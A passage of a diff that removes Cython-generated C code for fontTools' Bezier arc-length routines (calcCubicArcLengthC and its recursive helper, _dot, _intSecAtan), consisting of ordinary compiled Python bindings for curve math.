abs(p0 - p3) # <<<<<<<<<<<<<< - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: - */ - __pyx_v_arch = __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p0, __pyx_v_p3)); - - /* "fontTools/misc/bezierTools.py":94 - * def _calcCubicArcLengthCRecurse(mult, p0, p1, p2, p3): - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) # <<<<<<<<<<<<<< - * if arch * mult >= box: - * return (arch + box) * 0.5 - */ - __pyx_v_box = 
((__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p0, __pyx_v_p1)) + __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p1, __pyx_v_p2))) + __Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_p2, __pyx_v_p3))); - - /* "fontTools/misc/bezierTools.py":95 - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: # <<<<<<<<<<<<<< - * return (arch + box) * 0.5 - * else: - */ - __pyx_t_1 = ((__pyx_v_arch * __pyx_v_mult) >= __pyx_v_box); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":96 - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: - * return (arch + box) * 0.5 # <<<<<<<<<<<<<< - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyFloat_FromDouble(((__pyx_v_arch + __pyx_v_box) * 0.5)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 96, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":95 - * arch = abs(p0 - p3) - * box = abs(p0 - p1) + abs(p1 - p2) + abs(p2 - p3) - * if arch * mult >= box: # <<<<<<<<<<<<<< - * return (arch + box) * 0.5 - * else: - */ - } - - /* "fontTools/misc/bezierTools.py":98 - * return (arch + box) * 0.5 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) # <<<<<<<<<<<<<< - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_split_cubic_into_two); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_p0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_v_p1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __pyx_PyComplex_FromComplex(__pyx_v_p2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 98, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __pyx_PyComplex_FromComplex(__pyx_v_p3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_8, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_9, 4+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_2))) || (PyList_CheckExact(__pyx_t_2))) { - PyObject* sequence = __pyx_t_2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 98, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_7 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_7 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_7); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_7)) 
__PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - #endif - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 98, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_10 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_3 = __pyx_t_10(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_7 = __pyx_t_10(__pyx_t_6); if (unlikely(!__pyx_t_7)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_7); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_10(__pyx_t_6), 2) < 0) __PYX_ERR(0, 98, __pyx_L1_error) - __pyx_t_10 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_10 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 98, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_one = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_two = __pyx_t_7; - __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":99 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_7); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error); - __pyx_t_7 = 0; - __pyx_t_7 = 
__Pyx_PySequence_Tuple(__pyx_v_one); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_6 = PyNumber_Add(__pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_6, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - - /* "fontTools/misc/bezierTools.py":100 - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 100, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":99 - * else: - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":100 - * one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( - * mult, *two # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_2 = __Pyx_PySequence_Tuple(__pyx_v_two); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":99 - * else: - * 
one, two = _split_cubic_into_two(p0, p1, p2, p3) - * return _calcCubicArcLengthCRecurse(mult, *one) + _calcCubicArcLengthCRecurse( # <<<<<<<<<<<<<< - * mult, *two - * ) - */ - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_t_5, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Add(__pyx_t_7, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 99, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools._calcCubicArcLengthCRecurse", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_one); - __Pyx_XDECREF(__pyx_v_two); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject 
*__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC, "calcCubicArcLengthC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double tolerance=0.005)\nCalculates the arc length for a cubic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers.\n tolerance: Controls the precision of the calcuation.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC = {"calcCubicArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_tolerance; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = 
{&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_tolerance,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 1); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 2); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, 
__pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, 3); __PYX_ERR(0, 104, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_tolerance); - if (value) { values[4] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicArcLengthC") < 0)) __PYX_ERR(0, 104, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - if (values[4]) { - __pyx_v_tolerance = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_tolerance == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 115, __pyx_L3_error) - } else { - __pyx_v_tolerance = ((double)((double)0.005)); - } - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicArcLengthC", 0, 4, 5, __pyx_nargs); 
__PYX_ERR(0, 104, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_tolerance); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_tolerance) { - double __pyx_v_mult; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcCubicArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":125 - * Arc length value. 
- * """ - * mult = 1.0 + 1.5 * tolerance # The 1.5 is a empirical hack; no math # <<<<<<<<<<<<<< - * return _calcCubicArcLengthCRecurse(mult, pt1, pt2, pt3, pt4) - * - */ - __pyx_v_mult = (1.0 + (1.5 * __pyx_v_tolerance)); - - /* "fontTools/misc/bezierTools.py":126 - * """ - * mult = 1.0 + 1.5 * tolerance # The 1.5 is a empirical hack; no math - * return _calcCubicArcLengthCRecurse(mult, pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicArcLengthCRecurse); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyFloat_FromDouble(__pyx_v_mult); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_v_pt2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __pyx_PyComplex_FromComplex(__pyx_v_pt3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_7 = __pyx_PyComplex_FromComplex(__pyx_v_pt4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_8 = NULL; - __pyx_t_9 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_8)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_8); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_9 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[6] = {__pyx_t_8, __pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_9, 5+__pyx_t_9); - __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - 
__Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 126, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":133 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_t_double_complex __pyx_v_v1, __pyx_t_double_complex __pyx_v_v2) { - double __pyx_r; - - /* "fontTools/misc/bezierTools.py":138 - * @cython.locals(v1=cython.complex, v2=cython.complex) - * def _dot(v1, v2): - * return (v1 * v2.conjugate()).real # <<<<<<<<<<<<<< - * - * - */ - __pyx_r = __Pyx_CREAL(__Pyx_c_prod_double(__pyx_v_v1, __Pyx_c_conj_double(__pyx_v_v2))); - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":133 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - - /* function exit code */ - __pyx_L0:; - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":141 - * - * - * @cython.cfunc # <<<<<<<<<<<<<< - * @cython.inline - * @cython.returns(cython.double) - */ - -static CYTHON_INLINE 
double __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(double __pyx_v_x) { - double __pyx_r; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - double __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_intSecAtan", 1); - - /* "fontTools/misc/bezierTools.py":148 - * # In : sympy.integrate(sp.sec(sp.atan(x))) - * # Out: x*sqrt(x**2 + 1)/2 + asinh(x)/2 - * return x * math.sqrt(x**2 + 1) / 2 + math.asinh(x) / 2 # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_1 = PyFloat_FromDouble(__pyx_v_x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 148, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = 